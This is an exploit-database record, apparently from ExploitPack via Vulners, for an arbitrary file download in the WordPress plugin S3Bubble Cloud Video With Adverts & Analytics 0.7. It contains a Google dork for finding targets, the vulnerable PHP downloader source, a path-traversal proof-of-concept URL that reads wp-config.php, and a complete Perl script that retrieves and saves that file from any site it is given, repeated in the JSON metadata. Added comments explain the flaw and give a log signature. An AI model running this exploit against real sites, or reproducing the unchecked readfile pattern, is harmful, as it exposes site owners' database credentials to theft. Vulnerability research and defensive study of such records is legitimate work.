ID EXPLOITPACK:49F47E1DE6448F19723FA0076205BDE3
Type exploitpack
Reporter CrashBandicot
Modified 2015-07-05T00:00:00
Description
WordPress Plugin S3Bubble Cloud Video With Adverts Analytics 0.7 - Arbitrary File Download
# Exploit Title: Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download
# Google Dork: inurl:/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/
# Date: 04/07/2015
# Exploit Author: CrashBandicot @DosPerl
# Vendor Homepage: https://s3bubble.com
# Software Link: https://wordpress.org/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/
# Version: 0.7
# Tested on: MSWin32
# EDB note: updated the Software Link to point to the correct plugin.
# Vulnerable File : /wp-content/plugins/..../assets/plugins/ultimate/content/downloader.php
<?php
// downloader.php as quoted by the advisory for plugin version 0.7.
// Nothing in the quoted code checks authentication, a capability or a nonce
// before a file is read, and both query parameters are used as received.
header("Content-Type: application/octet-stream");
// 'name' is copied from the query string into a response header without
// validation or quoting, so the requester chooses the download filename.
header("Content-Disposition: attachment; filename=". $_GET['name']);
// PHP has already URL-decoded $_GET values; urldecode() decodes a second
// time, so a filter that inspects only the once-decoded value can miss
// double-encoded "../" sequences.
$path = urldecode($_GET['path']);
// isset() is always true here because $path was assigned on the line above,
// so this is not a guard. readfile() then streams whatever path was supplied:
// there is no base directory, no realpath() containment check and no
// allowlist, which is the arbitrary file read the advisory describes.
// Fix direction: resolve the path with realpath() and require it to sit under
// one intended media directory (or map an opaque id to a server-side path),
// and serve the file only to an authenticated, authorised request.
if(isset($path))readfile($path);
?>
# PoC : http://127.0.0.1/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=../../../../../../../wp-config.php
# Exploit :
#!/usr/bin/perl
# Proof-of-concept client for the downloader.php arbitrary file download.
# It issues a single GET request and saves the response body to a local file
# named wp-config.php.
# NOTE(review): there is no `use strict` / `use warnings`; $Target, $path,
# $xpl, $ua and $req are undeclared package globals.
use LWP::UserAgent;
# Cosmetic: clears the terminal through the platform's shell command.
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
# Two arguments are required: the site, and a path prefix that is placed
# between the site and /wp-content when the URL is built below.
if(@ARGV < 2)
{
die("\n\n[+] usage : perl $0 site.com /path/");
}
# Banner only.
print q{
Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download
->CrashBandicot
};
($Target,$path) = @ARGV;
# Default to plain http:// when the argument carries no scheme.
if($Target !~ /^(http|https):\/\//)
{
$Target = "http://$Target";
}
# Request signature for defenders: a GET to the plugin's
# .../ultimate/content/downloader.php whose `path` parameter contains "../"
# sequences. This is the pattern to search for in web access logs and the one
# a WAF rule or the patched plugin has to reject.
$xpl = "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php";
my $url = $Target.$path.$xpl;
print "\n [?] Exploiting ...... \n\n";
# TLS hostname verification is switched off for this request.
$ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
# ":content_file" makes LWP write the response body straight to wp-config.php
# in the current working directory instead of keeping it in memory.
$req = $ua->get($url,":content_file" => "wp-config.php");
# is_success reflects only the HTTP status code; it does not show that the
# body is the requested file. An endpoint that answers 200 with an empty body
# is still reported as "Exploited", so inspect the saved file when this
# script is used to confirm that a fix is effective.
if ($req->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] File save to name : wp-config.php\n";
}
else
{
die("[!] Exploit Failed !\n");
}
# NOTE(review): `_END_` is not Perl's `__END__` token; without strict it is
# parsed as a bareword string in void context and has no effect.
_END_
{"lastseen": "2020-04-01T19:05:08", "references": [], "description": "\nWordPress Plugin S3Bubble Cloud Video With Adverts Analytics 0.7 - Arbitrary File Download", "edition": 1, "reporter": "CrashBandicot", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2015-07-05T00:00:00", "title": "WordPress Plugin S3Bubble Cloud Video With Adverts Analytics 0.7 - Arbitrary File Download", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:05:08", "rev": 2}, "score": {"value": -0.5, "vector": "NONE", "modified": "2020-04-01T19:05:08", "rev": 2}, "vulnersScore": -0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-07-05T00:00:00", "id": "EXPLOITPACK:49F47E1DE6448F19723FA0076205BDE3", "href": "", "viewCount": 3, "sourceData": "# Exploit Title: Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download\n# Google Dork: inurl:/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/\n# Date: 04/07/2015\n# Exploit Author: CrashBandicot @DosPerl\n# Vendor Homepage: https://s3bubble.com\n# Software Link: https://wordpress.org/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/\n# Version: 0.7\n# Tested on: MSWin32\n\n#EDB note: updated Software link to correct plugin.\n\n# Vulnerable File : /wp-content/plugins/..../assets/plugins/ultimate/content/downloader.php\n\n<?php \n header(\"Content-Type: application/octet-stream\");\n header(\"Content-Disposition: attachment; filename=\". $_GET['name']);\n $path = urldecode($_GET['path']);\n if(isset($path))readfile($path);\n?>\n\n\n# PoC : http://127.0.0.1/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=../../../../../../../wp-config.php\n\n\n# Exploit : \n\n\n#!/usr/bin/perl\n\nuse LWP::UserAgent;\n \nsystem(($^O eq 'MSWin32') ? 
'cls' : 'clear');\n \nif(@ARGV < 2)\n{\ndie(\"\\n\\n[+] usage : perl $0 site.com /path/\");\n}\n\nprint q{\n Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download\n ->CrashBandicot\n \n \n};\n\n($Target,$path) = @ARGV;\n\nif($Target !~ /^(http|https):\\/\\//)\n{\n$Target = \"http://$Target\";\n}\n\n$xpl = \"/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php\";\nmy $url = $Target.$path.$xpl;\nprint \"\\n [?] Exploiting ...... \\n\\n\";\n \n$ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });\n$req = $ua->get($url,\":content_file\" => \"wp-config.php\");\n \nif ($req->is_success)\n{\nprint \"[+] $url Exploited!\\n\\n\";\nprint \"[+] File save to name : wp-config.php\\n\";\n}\nelse\n{\ndie(\"[!] Exploit Failed !\\n\");\n}\n\n_END_", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}
{}